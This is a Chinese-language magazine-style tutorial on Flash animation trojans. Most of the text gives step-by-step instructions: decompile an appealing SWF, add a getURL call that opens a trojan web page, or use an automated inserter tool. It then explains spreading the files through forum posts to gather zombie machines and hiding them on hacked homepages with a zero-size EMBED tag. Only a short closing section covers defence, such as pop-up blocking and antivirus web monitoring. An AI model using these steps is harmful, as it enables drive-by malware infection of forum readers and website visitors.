在网站上观看Flash动画,接收到“好友”发来的一张Flash贺卡,甚至于一个QQ魔法表情,一不留神就中了一个木马!Flash动画木马可以说是无处不在,攻击威力和覆盖面极其广。许多朋友一定想了解Flash木马的原理,想知道攻击者是如何在SWF中插入木马的呢?我们应该怎么样来防范Flash木马呢?
一、制作Flash动画木马的准备
Flash动画木马的原理,是在网页中显示或本地直接播放Flash动画木马时,让Flash自动打开一个网址,而该网址就是我们预先制作好的一个木马网页。也就是说,在制作网页木马前,我们首先需要制作好一个网页木马,并将它放置到某个网站上去。关于网页木马的具体制作方法,不是今天要讲的内容,大家可参考以前的《网友世界》杂志。
另外,我们还需要准备一个比较吸引人的Flash动画文件“MM热舞.swf”,以及Flash动画反编译工具“闪客精灵”,编辑工具Macromedia Flash MX。
二、最原始的Flash木马
现在虽然有了许多各种各样的Flash动画木马制作工具,但是为了了解Flash动画木马的最基本原理,有必要从头开始用最原始的方法制作一个Flash木马。
步骤一:反编译SWF动画
首先我们需要将要插入网页木马的Flash动画文件“MM热舞.swf”,反编译成可编辑的.fla格式。运行“闪客精灵”,点击菜单“文件”→“快速打开”命令,指定“MM热舞.swf”文件将其导入。然后点击工具栏上的“导出FLA”命令,将动画导出为“MM热舞.fla”文件(如图1)。
图1
步骤二:插入网页木马代码
然后运行Flash动画编辑器Macromedia Flash MX,点击菜单“文件”→“打开”,调入刚才保存的fla文件。展开界面下方的“动作/帧”栏,再展开“动作”→“浏览器/网络”项,点击其中的“getURL”命令,在右边窗口中的“URL”里面输入我们的网页木马地址;窗口方式为“_blank”;“变量”设置为“使用GET方式发送”,在下方的代码窗口中将出现“getURL("http://网页木马地址", "_blank", "GET");”(如图2)。
图2
步骤三:生成Flash木马
设置完毕后保存文件,并点击菜单“文件”→“发布”命令,将动画重新导出为SWF格式。用IE浏览器打开刚才生成的Flash动画木马,可以看到随着Flash动画打开播放时,自动弹出一个浏览器窗口,里面将会显示我们的木马网页。
三、简简单单生成Flash木马
上面插入木马的过程比较麻烦,下面我们介绍一个简单的方法,也正是这些简单的工具使得Flash木马在网上随处可见。
运行SWF木马插入器,点击界面中的“选择”按钮,浏览指定要插入木马的SWF文件;在“插入代码”中输入木马网页的地址;切记不要勾选下面的“只解压”项。设置完毕后,点击“给我插”按钮,程序提示开始插入木马网页(如图3)。显示成功信息后,关闭程序,用IE打开生成的动画,可以看到自动跳转到木马网页去了。
·手动查杀病毒和木马的通用方法·新手也能对付病毒:巧设密码气死木马·高手详解:木马和病毒清除的通用解法·教你手动查杀病毒和木马的通用方法·用病毒木马进程速查表检查系统·清除病毒木马从它的寄生场所开始·“灰鸽子”木马背后庞大的黑色产业链条·巧妙从进程中判断出病毒和木马·菜鸟安全防患之饿死木马·关于反木马,“上帝们”必须知道的真相 图3
四、Flash木马的利用
看到上面的步骤了吧,生成一个Flash动画木马是不是很简单?那么生成的Flash木马该如何应用呢?只要我们将Flash上传到某个网站中,就可以通过论坛或网站之类的直接利用了。
大部分的论坛中都可以发来Flash动画的帖子,利用论坛发帖,攻击者可以快速获得大量的肉鸡。以PHPWind v4.3.2 论坛为例,在发帖或回复时,点击编辑窗口上方的“插入Flash动画”按钮,设置Flash窗口大小,使用默认设置后,要求输入Flash的URL地址(如图4)。确定后,可以看到编辑窗口中显示的代码为“[flash=400,300]http://www.flash888.com.cn/upfiles/2006728.swf[/flash]”(如图5),这就是完整的Flash播放代码了,不同的论坛代码是不一样的。
图4
图5
应用二:网页嵌入Flash木马
攻击者入侵了某个大的网站之后,很可能在网站首页挂马,使用普通方式挂马会被管理员发觉,但是挂上Flash木马的话,是很难查杀的。攻击者可能在网页中插入如下代码:
“《EMBED src=http://网页木马地址/木马.swf width=0 height=0 type=application/x-shockwave-flash AUTOSTART="false" ShowStatusBar="false"》”,其中的《》改为<>。
这里的参数“width=0 height=0”表示,Flash播放窗口为零,也就是不显示Flash播放窗口。其它用户浏览网页时,就会莫名其妙的弹出一个木马网页窗口。
五、关于Flash木马的防范
其实不管Flash木马有多么的巧妙,最终都是要跳转到木马网页去的,也就是说我们最终要防范的还是网页木马。了解了思路,对于Flash动画木马就简单了:
首先,要开启Windows XP SP2的窗口拦截窗口功能,或安装其它防弹出窗口的插件。如果那个漏网之鱼,莫名其妙弹出的网页窗口要及时的关闭。另外,一定要在上网浏览时开启杀毒软件的网页监控功能,只要网页木马在后台一下载到本地硬盘,就会被杀毒软件查杀,这样就万事无忧了!